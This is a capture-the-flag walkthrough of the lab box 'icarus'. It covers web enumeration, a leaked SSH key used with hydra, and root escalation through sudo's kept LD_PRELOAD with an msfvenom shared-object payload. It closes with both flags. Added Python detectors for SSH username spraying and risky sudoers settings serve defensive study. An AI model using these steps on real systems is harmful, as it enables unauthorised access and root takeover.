ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access.

Nmap Results
# Nmap 7.95 scan initiated Thu Nov 20 17:32:45 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.15
Nmap scan report for 10.9.9.15
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b6:65:56:40:8d:a8:57:b9:15:1e:0e:1f:a5:d0:52:3a (RSA)
| 256 79:65:cb:2a:06:82:13:d3:76:6b:1c:55:cd:8f:07:b7 (ECDSA)
|_ 256 b1:34:e5:21:a0:28:30:c0:6c:01:0e:b0:7b:8f:b8:c6 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: LOGIN
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 20 17:32:57 2025 -- 1 IP address (1 host up) scanned in 12.66 seconds

ℹ️
For convenience, I'm going to add an entry to my /etc/hosts file so I don't have to repeatedly type the IP address.
echo -e '10.9.9.15\t\ticarus.hmv' | sudo tee -a /etc/hosts

Service Enumeration
TCP/80

Penetration Testing
ℹ️
Normally, I'd do a walk of the application before doing the penetration test, but since this app is pretty simple and only presents a login screen, we'll get right into it.


/check.php

Directory and File Enumeration
gobuster dir -u http://icarus.hmv -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php -t 100 -o dir.txt
The /a file is pretty interesting at 9641 bytes.
curl -s http://icarus.hmv/a
The contents resemble gobuster output. I suspect these may be URLs.
curl -s http://icarus.hmv/a | xargs -I {} curl 'http://icarus.hmv/{}'
Iterate over each URL and see what we get...

cat << EOF > id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
EOF
Save the SSH key to a file for later.
Username Enumeration
We have an SSH key for some user, but who? We have a few options here:
- Take some lucky guesses
- See if the web app reveals known usernames
- Use hydra and the sshkey module to brute force a potential login
💡
The box is called icarus, so it makes sense to try that first...
hydra -I -f -V -l icarus -p id_rsa sshkey://icarus.hmv
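From the defender's side, the hydra sshkey approach leaves a recognisable trace in sshd's log: one source address trying a single key against a run of usernames, followed (if a guess lands) by an "Accepted publickey" for the same address and key fingerprint. The following detection is an added example and not part of the original writeup; it generalises beyond the single-username guess above to the many-username case. The log lines, hostnames, ports and fingerprints are constructed, and the function names are my own. Note that "Failed publickey" lines are only written when sshd runs with LogLevel VERBOSE; "Invalid user" lines are written at the default level.

```python
import re
from collections import defaultdict

# Constructed sample sshd log lines (not captured from the box).  One source,
# 10.9.9.100, tries several usernames with a key and then succeeds as icarus;
# 10.9.9.50 is an ordinary single successful login for comparison.
SAMPLE_AUTH_LOG = """\
Nov 20 17:40:01 icarus sshd[1201]: Invalid user admin from 10.9.9.100 port 40110
Nov 20 17:40:01 icarus sshd[1201]: Connection closed by invalid user admin 10.9.9.100 port 40110 [preauth]
Nov 20 17:40:01 icarus sshd[1203]: Invalid user www-data from 10.9.9.100 port 40112
Nov 20 17:40:02 icarus sshd[1205]: Failed publickey for root from 10.9.9.100 port 40114 ssh2: RSA SHA256:CONSTRUCTEDFINGERPRINT
Nov 20 17:40:02 icarus sshd[1207]: Accepted publickey for icarus from 10.9.9.100 port 40116 ssh2: RSA SHA256:CONSTRUCTEDFINGERPRINT
Nov 20 17:41:10 icarus sshd[1220]: Accepted publickey for icarus from 10.9.9.50 port 51000 ssh2: ED25519 SHA256:OTHERCONSTRUCTEDFP
"""

# sshd message formats: "Invalid user X from IP ..." (default LogLevel),
# "Failed publickey for X from IP ..." (LogLevel VERBOSE) and
# "Accepted publickey for X from IP port N ssh2: TYPE SHA256:..." (default).
INVALID_USER = re.compile(r"Invalid user (\S+) from (\d+\.\d+\.\d+\.\d+)")
FAILED_KEY = re.compile(r"Failed publickey for (\S+) from (\d+\.\d+\.\d+\.\d+)")
ACCEPTED_KEY = re.compile(
    r"Accepted publickey for (\S+) from (\d+\.\d+\.\d+\.\d+) port \d+ ssh2: (\S+ SHA256:\S+)"
)


def summarize_by_source(log_text):
    """Group usernames attempted and logins accepted by source address."""
    per_ip = defaultdict(lambda: {"tried": set(), "accepted": []})
    for line in log_text.splitlines():
        for pattern in (INVALID_USER, FAILED_KEY):
            m = pattern.search(line)
            if m:
                per_ip[m.group(2)]["tried"].add(m.group(1))
        m = ACCEPTED_KEY.search(line)
        if m:
            # Keep the key fingerprint so it can be matched against an
            # inventory of keys that are supposed to exist for that user.
            per_ip[m.group(2)]["accepted"].append((m.group(1), m.group(3)))
    return per_ip


def detect_username_spray(log_text, min_distinct_users=3):
    """Alert on sources that tried many usernames; include any later success."""
    alerts = []
    for ip, info in sorted(summarize_by_source(log_text).items()):
        if len(info["tried"]) >= min_distinct_users:
            alerts.append({
                "source": ip,
                "usernames_tried": sorted(info["tried"]),
                "accepted": info["accepted"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_username_spray(SAMPLE_AUTH_LOG):
        print(alert)
```

The threshold is deliberately low because a legitimate key holder rarely has to guess their own username; tune `min_distinct_users` and add a time window for busy bastion hosts. A spray that succeeds on the first guess (as the single `-l icarus` attempt above would) produces no failures at all, which is why the accepted fingerprint is kept for correlation against known keys.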
Exploit
ssh -i id_rsa icarus@icarus.hmv
Post-Exploit Enumeration
Operating Environment
OS & Kernel
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
Linux icarus 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
Current User
uid=1000(icarus) gid=1000(icarus) groups=1000(icarus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Matching Defaults entries for icarus on icarus:
env_reset, mail_badpass, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icarus may run the following commands on icarus:
(ALL : ALL) NOPASSWD: /usr/bin/id
Network Configurations
Network Interfaces
ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether bc:24:11:af:16:08 brd ff:ff:ff:ff:ff:ff
inet 10.9.9.15/24 brd 10.9.9.255 scope global dynamic ens18
valid_lft 4979sec preferred_lft 4979sec
inet6 fe80::be24:11ff:feaf:1608/64 scope link
valid_lft forever preferred_lft forever
Privilege Escalation
Becoming Root
Sudo Environment Variable
Running sudo -l upon SSH'ing into the target, the exploit immediately sticks out...

This user is allowed to keep the LD_PRELOAD environment variable when running sudo /usr/bin/id (env_keep+=LD_PRELOAD in the Defaults above, and the rule is NOPASSWD). LD_PRELOAD tells the dynamic loader to load the named shared object into a process before anything else, so a shared object we control (a .so file, similar to a .dll on Windows) gets loaded and executed in the root user's context.
💡
A .so file is similar in design to a .dll file on Windows, in that it allows a developer, engineer, etc. to write a set of reusable code once and ship it to hosts so that other programs can call this reusable code. Except in our case, the reusable code will contain a malicious set of instructions.
msfvenom -p linux/x64/exec CMD="/bin/bash -ip" -f elf-so -o root.so
Generate a .so to spawn a bash shell
scp -i id_rsa root.so icarus@icarus.hmv:/tmp
Copy the .so to the
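The root cause here is a sudoers setting, not a bug in /usr/bin/id: env_reset normally strips loader-controlling variables, and env_keep+=LD_PRELOAD undoes that for every command the user may run. The audit below is an added example and not part of the original writeup. It parses `sudo -l` output (the constructed sample reproduces the entries shown in the Post-Exploit Enumeration section), flags env_keep entries that admit variables which control what code the dynamic loader or interpreter pulls into a privileged process, flags passwordless rules, and renders the Defaults line with the offending env_keep removed. The set of dangerous variables and all function names are my own.

```python
import re

# Variables that let the caller choose code loaded into a privileged process.
# sudo's env_reset drops them by default; env_keep re-admits them.  This set is
# an assumption for the example, not an exhaustive list.
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "PYTHONPATH", "PERL5OPT"}

# Constructed sample: `sudo -l` output matching what the writeup shows.
SUDO_L_OUTPUT = """\
Matching Defaults entries for icarus on icarus:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User icarus may run the following commands on icarus:
    (ALL : ALL) NOPASSWD: /usr/bin/id
"""


def parse_sudo_l(text):
    """Split `sudo -l` output into its Defaults entries and its command rules."""
    defaults, rules = [], []
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped.startswith("Matching Defaults entries"):
            section = "defaults"
            continue
        if stripped.startswith("User ") and "may run" in stripped:
            section = "rules"
            continue
        if section == "defaults":
            # Defaults are comma separated; secure_path uses "\:" not commas.
            defaults.extend(d.strip() for d in stripped.split(","))
        elif section == "rules":
            rules.append(stripped)
    return defaults, rules


def kept_env_vars(defaults):
    """Return the variables re-admitted through env_keep (+= or =)."""
    kept = set()
    for d in defaults:
        m = re.match(r'env_keep\s*\+?=\s*"?([^"]*)"?$', d)
        if m:
            kept.update(m.group(1).split())
    return kept


def audit(text):
    """List risky settings: dangerous env_keep variables and passwordless rules."""
    defaults, rules = parse_sudo_l(text)
    findings = []
    for var in sorted(kept_env_vars(defaults) & DANGEROUS_ENV):
        findings.append(
            f"env_keep admits {var}: any permitted sudo command can load "
            f"caller-chosen code as the target user"
        )
    for rule in rules:
        if "NOPASSWD" in rule:
            findings.append(f"passwordless rule: {rule}")
    return findings


def hardened_defaults(defaults):
    """Drop env_keep entries for dangerous variables; leave everything else as-is."""
    out = []
    for d in defaults:
        if d.startswith("env_keep"):
            kept = kept_env_vars([d]) - DANGEROUS_ENV
            if not kept:
                continue  # nothing safe left to keep, remove the entry
            d = 'env_keep+="' + " ".join(sorted(kept)) + '"'
        out.append(d)
    return out


def sudoers_defaults_line(defaults):
    """Render a Defaults line for /etc/sudoers (apply it with visudo)."""
    return "Defaults " + ", ".join(defaults)


if __name__ == "__main__":
    for finding in audit(SUDO_L_OUTPUT):
        print("FINDING:", finding)
    defaults, _ = parse_sudo_l(SUDO_L_OUTPUT)
    print("Suggested:", sudoers_defaults_line(hardened_defaults(defaults)))
```

Removing the env_keep entry is the fix; env_reset then strips LD_PRELOAD before /usr/bin/id starts, and a NOPASSWD rule for a harmless binary stops being a path to root. Run the parser over `sudo -l -U <user>` output for each account on a host, or directly over /etc/sudoers and /etc/sudoers.d, to find the same pattern elsewhere.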


Flags
User
Dontgotothesun
Root
RIPicarus